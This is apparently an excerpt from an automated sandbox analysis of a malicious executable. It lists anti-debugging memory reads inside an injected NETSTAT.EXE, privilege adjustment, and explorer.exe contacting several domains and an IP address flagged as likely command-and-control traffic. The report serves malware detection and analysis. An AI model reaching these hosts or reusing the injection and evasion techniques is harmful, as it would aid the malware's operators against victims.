          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386F358 mov eax, dword ptr fs:[00000030h]4_2_0386F358
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386DB60 mov ecx, dword ptr fs:[00000030h]4_2_0386DB60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03893B7A mov eax, dword ptr fs:[00000030h]4_2_03893B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03893B7A mov eax, dword ptr fs:[00000030h]4_2_03893B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389D294 mov eax, dword ptr fs:[00000030h]4_2_0389D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389D294 mov eax, dword ptr fs:[00000030h]4_2_0389D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]4_2_038652A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]4_2_038652A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]4_2_038652A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]4_2_038652A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]4_2_038652A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387AAB0 mov eax, dword ptr fs:[00000030h]4_2_0387AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387AAB0 mov eax, dword ptr fs:[00000030h]4_2_0387AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389FAB0 mov eax, dword ptr fs:[00000030h]4_2_0389FAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892ACB mov eax, dword ptr fs:[00000030h]4_2_03892ACB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892AE4 mov eax, dword ptr fs:[00000030h]4_2_03892AE4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AA16 mov eax, dword ptr fs:[00000030h]4_2_0392AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AA16 mov eax, dword ptr fs:[00000030h]4_2_0392AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03878A0A mov eax, dword ptr fs:[00000030h]4_2_03878A0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386AA16 mov eax, dword ptr fs:[00000030h]4_2_0386AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386AA16 mov eax, dword ptr fs:[00000030h]4_2_0386AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03883A1C mov eax, dword ptr fs:[00000030h]4_2_03883A1C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]4_2_03865210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov ecx, dword ptr fs:[00000030h]4_2_03865210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]4_2_03865210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]4_2_03865210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A4A2C mov eax, dword ptr fs:[00000030h]4_2_038A4A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A4A2C mov eax, dword ptr fs:[00000030h]4_2_038A4A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]4_2_03869240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]4_2_03869240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]4_2_03869240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]4_2_03869240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392EA55 mov eax, dword ptr fs:[00000030h]4_2_0392EA55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038F4257 mov eax, dword ptr fs:[00000030h]4_2_038F4257
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A927A mov eax, dword ptr fs:[00000030h]4_2_038A927A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391B260 mov eax, dword ptr fs:[00000030h]4_2_0391B260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391B260 mov eax, dword ptr fs:[00000030h]4_2_0391B260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938A62 mov eax, dword ptr fs:[00000030h]4_2_03938A62
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388C182 mov eax, dword ptr fs:[00000030h]4_2_0388C182
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A185 mov eax, dword ptr fs:[00000030h]4_2_0389A185
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892990 mov eax, dword ptr fs:[00000030h]4_2_03892990
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E69A6 mov eax, dword ptr fs:[00000030h]4_2_038E69A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038961A0 mov eax, dword ptr fs:[00000030h]4_2_038961A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038961A0 mov eax, dword ptr fs:[00000030h]4_2_038961A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]4_2_038E51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]4_2_038E51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]4_2_038E51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]4_2_038E51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038F41E8 mov eax, dword ptr fs:[00000030h]4_2_038F41E8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]4_2_0386B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]4_2_0386B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]4_2_0386B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]4_2_03869100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]4_2_03869100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]4_2_03869100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]4_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]4_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]4_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]4_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov ecx, dword ptr fs:[00000030h]4_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389513A mov eax, dword ptr fs:[00000030h]4_2_0389513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389513A mov eax, dword ptr fs:[00000030h]4_2_0389513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388B944 mov eax, dword ptr fs:[00000030h]4_2_0388B944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388B944 mov eax, dword ptr fs:[00000030h]4_2_0388B944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C962 mov eax, dword ptr fs:[00000030h]4_2_0386C962
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B171 mov eax, dword ptr fs:[00000030h]4_2_0386B171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B171 mov eax, dword ptr fs:[00000030h]4_2_0386B171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869080 mov eax, dword ptr fs:[00000030h]4_2_03869080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E3884 mov eax, dword ptr fs:[00000030h]4_2_038E3884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E3884 mov eax, dword ptr fs:[00000030h]4_2_038E3884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A90AF mov eax, dword ptr fs:[00000030h]4_2_038A90AF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov ecx, dword ptr fs:[00000030h]4_2_0389F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov eax, dword ptr fs:[00000030h]4_2_0389F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov eax, dword ptr fs:[00000030h]4_2_0389F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov ecx, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038658EC mov eax, dword ptr fs:[00000030h]4_2_038658EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03934015 mov eax, dword ptr fs:[00000030h]4_2_03934015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03934015 mov eax, dword ptr fs:[00000030h]4_2_03934015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]4_2_038E7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]4_2_038E7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]4_2_038E7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]4_2_0389002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]4_2_0389002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]4_2_0389002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]4_2_0389002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]4_2_0389002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]4_2_0387B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]4_2_0387B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]4_2_0387B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]4_2_0387B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03880050 mov eax, dword ptr fs:[00000030h]4_2_03880050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03880050 mov eax, dword ptr fs:[00000030h]4_2_03880050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03922073 mov eax, dword ptr fs:[00000030h]4_2_03922073
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03931074 mov eax, dword ptr fs:[00000030h]4_2_03931074
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03878794 mov eax, dword ptr fs:[00000030h]4_2_03878794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7794 mov eax, dword ptr fs:[00000030h]4_2_038E7794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7794 mov eax, dword ptr fs:[00000030h]4_2_038E7794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7794 mov eax, dword ptr fs:[00000030h]4_2_038E7794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A37F5 mov eax, dword ptr fs:[00000030h]4_2_038A37F5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A70E mov eax, dword ptr fs:[00000030h]4_2_0389A70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A70E mov eax, dword ptr fs:[00000030h]4_2_0389A70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0393070D mov eax, dword ptr fs:[00000030h]4_2_0393070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0393070D mov eax, dword ptr fs:[00000030h]4_2_0393070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388F716 mov eax, dword ptr fs:[00000030h]4_2_0388F716
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FFF10 mov eax, dword ptr fs:[00000030h]4_2_038FFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FFF10 mov eax, dword ptr fs:[00000030h]4_2_038FFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03864F2E mov eax, dword ptr fs:[00000030h]4_2_03864F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03864F2E mov eax, dword ptr fs:[00000030h]4_2_03864F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389E730 mov eax, dword ptr fs:[00000030h]4_2_0389E730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387EF40 mov eax, dword ptr fs:[00000030h]4_2_0387EF40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387FF60 mov eax, dword ptr fs:[00000030h]4_2_0387FF60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938F6A mov eax, dword ptr fs:[00000030h]4_2_03938F6A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FFE87 mov eax, dword ptr fs:[00000030h]4_2_038FFE87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E46A7 mov eax, dword ptr fs:[00000030h]4_2_038E46A7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03930EA5 mov eax, dword ptr fs:[00000030h]4_2_03930EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03930EA5 mov eax, dword ptr fs:[00000030h]4_2_03930EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03930EA5 mov eax, dword ptr fs:[00000030h]4_2_03930EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938ED6 mov eax, dword ptr fs:[00000030h]4_2_03938ED6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038936CC mov eax, dword ptr fs:[00000030h]4_2_038936CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A8EC7 mov eax, dword ptr fs:[00000030h]4_2_038A8EC7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391FEC0 mov eax, dword ptr fs:[00000030h]4_2_0391FEC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038776E2 mov eax, dword ptr fs:[00000030h]4_2_038776E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038916E0 mov ecx, dword ptr fs:[00000030h]4_2_038916E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C600 mov eax, dword ptr fs:[00000030h]4_2_0386C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C600 mov eax, dword ptr fs:[00000030h]4_2_0386C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C600 mov eax, dword ptr fs:[00000030h]4_2_0386C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03898E00 mov eax, dword ptr fs:[00000030h]4_2_03898E00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A61C mov eax, dword ptr fs:[00000030h]4_2_0389A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A61C mov eax, dword ptr fs:[00000030h]4_2_0389A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03921608 mov eax, dword ptr fs:[00000030h]4_2_03921608
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386E620 mov eax, dword ptr fs:[00000030h]4_2_0386E620
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391FE3F mov eax, dword ptr fs:[00000030h]4_2_0391FE3F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]4_2_03877E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]4_2_03877E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]4_2_03877E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]4_2_03877E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]4_2_03877E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]4_2_03877E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AE44 mov eax, dword ptr fs:[00000030h]4_2_0392AE44
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AE44 mov eax, dword ptr fs:[00000030h]4_2_0392AE44
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387766D mov eax, dword ptr fs:[00000030h]4_2_0387766D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]4_2_0388AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]4_2_0388AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]4_2_0388AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]4_2_0388AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]4_2_0388AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]4_2_03892581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]4_2_03892581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]4_2_03892581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]4_2_03892581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]4_2_03862D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]4_2_03862D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]4_2_03862D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]4_2_03862D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]4_2_03862D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389FD9B mov eax, dword ptr fs:[00000030h]4_2_0389FD9B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389FD9B mov eax, dword ptr fs:[00000030h]4_2_0389FD9B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038935A1 mov eax, dword ptr fs:[00000030h]4_2_038935A1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03891DB5 mov eax, dword ptr fs:[00000030h]4_2_03891DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03891DB5 mov eax, dword ptr fs:[00000030h]4_2_03891DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03891DB5 mov eax, dword ptr fs:[00000030h]4_2_03891DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039305AC mov eax, dword ptr fs:[00000030h]4_2_039305AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039305AC mov eax, dword ptr fs:[00000030h]4_2_039305AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]4_2_038E6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]4_2_038E6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]4_2_038E6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov ecx, dword ptr fs:[00000030h]4_2_038E6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]4_2_038E6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]4_2_038E6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03918DF1 mov eax, dword ptr fs:[00000030h]4_2_03918DF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387D5E0 mov eax, dword ptr fs:[00000030h]4_2_0387D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387D5E0 mov eax, dword ptr fs:[00000030h]4_2_0387D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]4_2_0392FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]4_2_0392FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]4_2_0392FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]4_2_0392FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938D34 mov eax, dword ptr fs:[00000030h]4_2_03938D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392E539 mov eax, dword ptr fs:[00000030h]4_2_0392E539
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894D3B mov eax, dword ptr fs:[00000030h]4_2_03894D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894D3B mov eax, dword ptr fs:[00000030h]4_2_03894D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894D3B mov eax, dword ptr fs:[00000030h]4_2_03894D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]4_2_03873D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386AD30 mov eax, dword ptr fs:[00000030h]4_2_0386AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038EA537 mov eax, dword ptr fs:[00000030h]4_2_038EA537
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A3D43 mov eax, dword ptr fs:[00000030h]4_2_038A3D43
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E3540 mov eax, dword ptr fs:[00000030h]4_2_038E3540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03887D50 mov eax, dword ptr fs:[00000030h]4_2_03887D50
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.contecoliving.com
          Source: C:\Windows\explorer.exeDomain query: www.constipationhub.com
          Source: C:\Windows\explorer.exeNetwork Connect: 69.163.220.52 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.identityofplace.com
          Source: C:\Windows\explorer.exeDomain query: www.tententacleshydro.com
